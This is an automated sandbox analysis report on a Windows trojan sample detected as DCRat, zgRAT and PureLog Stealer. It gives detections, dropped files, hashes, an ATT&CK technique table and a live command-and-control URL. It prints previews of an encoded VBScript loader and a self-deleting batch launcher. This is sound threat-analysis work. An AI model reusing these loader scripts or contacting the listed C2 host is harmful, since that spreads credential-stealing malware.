                                    Source: Yara match, File source: 11.0.fontReviewsavesinto.exe.610000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.HcEvQKWAu2.exe.66ce702.0.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0.3.HcEvQKWAu2.exe.6fcf702.1.unpack, type: UNPACKEDPE
                                    Source: Yara match, File source: 0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match, File source: C:\ComponentSavesinto\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara match, File source: C:\ComponentSavesinto\fontReviewsavesinto.exe, type: DROPPED
                                    Source: Yara match, File source: C:\Recovery\Registry.exe, type: DROPPED
                                    Source: Yara match, File source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, type: DROPPED
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information | 11 Scripting | Valid Accounts | 2 Command and Scripting Interpreter | 11 Scripting | 12 Process Injection | 22 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 13 Software Packing | DCSync | 136 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                    [Behavior graph. ID: 1549036, Sample: HcEvQKWAu2.exe, Startdate: 05/11/2024, Architecture: WINDOWS, Score: 100. Process chain: HcEvQKWAu2.exe started wscript.exe, which started cmd.exe, which started fontReviewsavesinto.exe, which started cmd.exe, which started fontReviewsavesinto.exe, w32tm.exe and chcp.com. The last fontReviewsavesinto.exe contacted 427176cm.nyashkoon.in (37.44.238.250, HARMONYHOSTING-ASFR, France).]

                                    Source | Detection | Scanner | Label | Link
                                    HcEvQKWAu2.exe | 63% | ReversingLabs | Win32.Trojan.Uztuby |
                                    HcEvQKWAu2.exe | 100% | Avira | VBS/Runner.VPG |
                                    HcEvQKWAu2.exe | 100% | Joe Sandbox ML | |

                                    Source | Detection | Scanner | Label | Link
                                    C:\ComponentSavesinto\fontReviewsavesinto.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Recovery\Registry.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe | 100% | Avira | VBS/Runner.VPG |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat | 100% | Avira | BAT/Delbat.C |
                                    C:\ComponentSavesinto\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ComponentSavesinto\fontReviewsavesinto.exe | 100% | Joe Sandbox ML | |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 100% | Joe Sandbox ML | |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 100% | Joe Sandbox ML | |
                                    C:\Recovery\Registry.exe | 100% | Joe Sandbox ML | |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 100% | Joe Sandbox ML | |
                                    C:\ComponentSavesinto\WmiPrvSE.exe | 100% | Joe Sandbox ML | |
                                    C:\ComponentSavesinto\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\ComponentSavesinto\fontReviewsavesinto.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Recovery\Registry.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |

                                    No Antivirus matches
                                    No Antivirus matches

                                    Source | Detection | Scanner | Label | Link
                                    http://427176cm.nyashkoon.in | 0% | Avira URL Cloud | safe |
                                    http://427176cm.nyashkoon.in_h | 0% | Avira URL Cloud | safe |
                                    http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php | 100% | Avira URL Cloud | malware |
                                    http://427176cm.nyashkX | 0% | Avira URL Cloud | safe |
                                    http://427176cm.nyashkoon.in/ | 0% | Avira URL Cloud | safe |
                                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                    427176cm.nyashkoon.in | 37.44.238.250 | true | true | | unknown

                                    Name | Malicious | Antivirus Detection | Reputation
                                    http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php | true | Avira URL Cloud: malware | unknown

                                    Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://427176cm.nyashkoon.in/ | fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                                    http://427176cm.nyashkoon.in_h | fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | fontReviewsavesinto.exe, 0000000B.00000002.1337505438.000000000330C000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                    http://427176cm.nyashkX | fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                    http://427176cm.nyashkoon.in | fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                        37.44.238.250 | 427176cm.nyashkoon.in | France | | 49434 | HARMONYHOSTING-ASFR | true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1549036
                                        Start date and time:2024-11-05 08:11:05 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 56s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:22
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:HcEvQKWAu2.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:3a92479aa98e55499bfa33bc2ea35b64.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@18/18@1/1
                                        EGA Information:
                                        • Successful, ratio: 33.3%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target fontReviewsavesinto.exe, PID 1648 because it is empty
                                        • Execution Graph export aborted for target fontReviewsavesinto.exe, PID 7392 because it is empty
                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: HcEvQKWAu2.exe
                                        Time | Type | Description
                                        02:12:17 | API Interceptor | 12777957x Sleep call for process: fontReviewsavesinto.exe modified
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (583), with no line terminators
                                        Category:dropped
                                        Size (bytes):583
                                        Entropy (8bit):5.899416173117914
                                        Encrypted:false
                                        SSDEEP:12:8vdukNV8BV0P5QKu1EneElZnNMGQtmAyPoVjc7a5BgTEPR:8BNiVeC2eOZnNMVyPopQYgs
                                        MD5:9EA0D930BD10D5ECC505361B03BB34F8
                                        SHA1:790CE83A096BD1B78B35087F2A6B52A38F9EA1C1
                                        SHA-256:56ACF07D027C265CC02803852DB2AB9FF8ADCC596BF2441608B898F6E8650BD8
                                        SHA-512:20AB8FA63E7AC3B6FDBFAA1EB64A261F1E8D332DFB2524E796644B93E4DCDF7B881D45E3DCF1CFF15893898618C1EBF16BB5B3795092E9E8A534826F4AF9B4F8
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (975), with no line terminators
                                        Category:dropped
                                        Size (bytes):975
                                        Entropy (8bit):5.910187537711719
                                        Encrypted:false
                                        SSDEEP:24:pyRWtgP9LdgH92dwLZf7sCbVkq1S0hEdNX0aIUD91TxcFP:pyR2gP9ccd4ZTsS3cZ0Zmi1
                                        MD5:68758E8A9B43DA177C92376FA00EE4C2
                                        SHA1:0E8A6023254FDB1D7577F9A994EC5CE0D4FA1804
                                        SHA-256:647C74F9159424382F9AD153EB0A8C49D098895D6A63220325A98DF7444D99F0
                                        SHA-512:1279C97EEEBA4D52B2C2887FB2AA1E90457A88C564278DA311BBC6C07253A159154D68B65E281CBEBE20D8B14728C1F9FDC038CBE02CE770675D98E5E4392A5E
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):242
                                        Entropy (8bit):5.900387505587373
                                        Encrypted:false
                                        SSDEEP:6:GjvwqK+NkLzWbHE08nZNDd3RL1wQJRiiEOHGZUt8eErn8MVxs:GiMCzWLE04d3XBJ/EAGqSu
                                        MD5:3076C2A420ABFAE7929160BA4D0A72B7
                                        SHA1:12B6BF6AB90923D5BDD316683B8ECCD25B478904
                                        SHA-256:12790BC3E92339D3720214576EE78D7546292F985D5A06EE20C19AA6AEA20344
                                        SHA-512:847910825012E426315C64FE5F949D63BCB3C60B51111C413198CC056E4EBC8475BF9C07B1CB021A82D8050B805606C1530A6431A8DA5F5021B60E81DD56B37E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Reputation:low
                                        Preview:#@~^2QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJZGswKx+.YUC\./rxDW&&\1Ybd.l9HOqP:!(2Y9sp-x6{l4+;R3B6~*t#toCpK;!N*2c4mYJBPZSP6ls/.ZEUAAA==^#~@.
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\WmiPrvSE.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\WmiPrvSE.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):87
                                        Entropy (8bit):4.9842094105546515
                                        Encrypted:false
                                        SSDEEP:3:6PjCyx03iHmR9Ig8A0LRATkbMLs0NTAn:6PNeiHmRqTybLs2A
                                        MD5:0F0C1382D77519A4E9B29D9AA39E786B
                                        SHA1:E230967A14B0854D217EBDBBD571F7BAE14BA176
                                        SHA-256:1BFF5ED332B1FB57070372EFA426BDB201534C2050CB16DD68C86E8595BF727A
                                        SHA-512:8435F2224FFE087669E382746587C4F583A15C1F0FA5939849882AECFF136C1A55557171A6F17E3B66A0FC0D0067888DE40EC02DCC70B86E35EE49C841CB2556
                                        Malicious:false
                                        Preview:%zrzX%%gWTY%..%rClUnpQxYcEm%"C:\ComponentSavesinto/fontReviewsavesinto.exe"%fGkFHEzrIt%
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (611), with no line terminators
                                        Category:dropped
                                        Size (bytes):611
                                        Entropy (8bit):5.873855614648897
                                        Encrypted:false
                                        SSDEEP:12:oHHjQZtEtu7CsBYAu81dVxrIkZ6vrMsE1Ub8OzvCLVn/1O2gdcJKRJd2:CHjQj7rBYF81dbrIkZuEG8Ozwn/fbJe2
                                        MD5:258B65E89B8901B9C5C62FE8ECBF6BA2
                                        SHA1:8DF33F6A01504659A8EE25DB1082171A7AA81710
                                        SHA-256:0C80C41E94292B261892EE45C5539288A903DB0C8E23D5EEEA9FE58A191D51B1
                                        SHA-512:10C4557F197B3A2114BE62BBE3F1089C59B37489316EC82CD59CCBDFF03F288F3BD1C114BE9F7339D1BDF1131956B7EBFF41A97028079665687A6CD2FB803146
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (710), with no line terminators
                                        Category:dropped
                                        Size (bytes):710
                                        Entropy (8bit):5.879417030654858
                                        Encrypted:false
                                        SSDEEP:12:F9UdldXpBhuKyXdk+fiB+c8K4983soWdC/35CjAc78H/AxUIYUo:odTheviBA98Vv5CjP78QYUo
                                        MD5:F0A435AF45AFA4D51D149203FF81327B
                                        SHA1:955F1208936A2577FAC46211FE220FD0A115A324
                                        SHA-256:A771B995A451FBD20438361CED5DA304F464926E7FEE492126D0037FE0AEC5C5
                                        SHA-512:241DD45C645181A537B58107ECC9A44907F6A028057D9DCB9876361C1167F59FFF8D1FC43547722F5A60B9A028CCF488B7F3AE610DB44120F960CB4C0F66603C
                                        Malicious:false
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Registry.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Registry.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):14
                                        Entropy (8bit):3.6644977792004623
                                        Encrypted:false
                                        SSDEEP:3:wnUW0Jkn:wnUW0Jk
                                        MD5:1B4376F148D57EFD3C47808442BDE878
                                        SHA1:18DC5F837F9FD44D60F83B9522B5801CAA9EC93F
                                        SHA-256:66238FD67AAC018B9A25F1E54FE27382489B73869315A345D1BFDF903AE98613
                                        SHA-512:5526B0CBB85047010379F83E3E102A521745139BDA3662CDB26CA0F10DC56A2C767FE0CADDEECC4BE3EDD18E35CAE7659E87D345C94FFC1B5CB9DCD7303D818C
                                        Malicious:false
                                        Preview:Ql5bqwB3QKXiDA
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):1089
                                        Entropy (8bit):5.357509376572314
                                        Encrypted:false
                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4x
                                        MD5:84D615B35EDCC29D404E189F0403DF92
                                        SHA1:9FA889FD1624FD4D42C8A1E53A6C878D563B2B05
                                        SHA-256:ED840908AC2487C0156C61BBFCF4332B1824C033F03400FE906BBB44482205F5
                                        SHA-512:ED5F44D349501CBC583275E7298F7546BCAC71674055767E57CA620A0E3EC48FA23B62A3BB4153B14AB7778740298BAF89E68BBA3663542D9086C0FEDA1599CD
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):25
                                        Entropy (8bit):4.243856189774723
                                        Encrypted:false
                                        SSDEEP:3:aVhXTMfdmn:aY4n
                                        MD5:1C595DF5A295BC17A66D57E7DC319559
                                        SHA1:A2CE7DD396538272DB5F81AE1E3AB8632DC0622B
                                        SHA-256:472B94F7BCF923F617192E8E9FEADE0DF7E5FDF8E27E667018E4B5637DEA1816
                                        SHA-512:F14E86730309E33480DC8B7FAC7EDB3D0448CF41DB931B96453758C1F1B522ACDD354AE0082801E09151AE6A1880AC91B4862372F71830FA18686212193367D2
                                        Malicious:false
                                        Preview:MbIi8SVa4brviCGuQUMQNShYB
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):225
                                        Entropy (8bit):5.085254888311013
                                        Encrypted:false
                                        SSDEEP:6:hCijTg3Nou1SV+DEQTdEwbLsYKOZG1cNwi23fOB:HTg9uYDEW2wE5Za
                                        MD5:511041A029093ABC1CAB7EC49C3AF0D5
                                        SHA1:D19752ECC439D5D6514348821E75196227F243BD
                                        SHA-256:31E8DE964638F0090CF35E8E752DAFA9E7D4C17F772CF05D51E29D5EA67CD46C
                                        SHA-512:C0D211C9B597C00E80DDD16C227B0B6F0A2F5EBB2E565265610472796479FAAE5F225CF94252EE98978715585AB8FC570E209CE76E5AB560F5F906E370C421AB
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ComponentSavesinto\fontReviewsavesinto.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\F0ZVhIKmod.bat"
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (676), with no line terminators
                                        Category:dropped
                                        Size (bytes):676
                                        Entropy (8bit):5.897054913297949
                                        Encrypted:false
                                        SSDEEP:12:maXrA+siuhcWoSXfBy4XVqFt8pxXc/dAKnS5iWIsWkQXMTENp7cTeBm1I6nJVn1j:v3moSXfFGtWmtS4WI35MsmdDn1j
                                        MD5:877E53FED4DB49CCC56C3A78580F5FB9
                                        SHA1:68B5AB48183AAD125B8C00A065AE66E455680135
                                        SHA-256:493B15714227A2142150651E458D37CCBAD24960478CD7C231646E3D8E28012F
                                        SHA-512:E782CF7CFACF08C64CAD02947DCD27F162E79E39948DDBD799637F258D9C57F42189172DCF0A28D8F831E232411AED9B71B3540F9F7CAB6C889834E2BE1FC506
                                        Malicious:false
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Process:C:\Windows\System32\w32tm.exe
                                        File Type:ASCII text
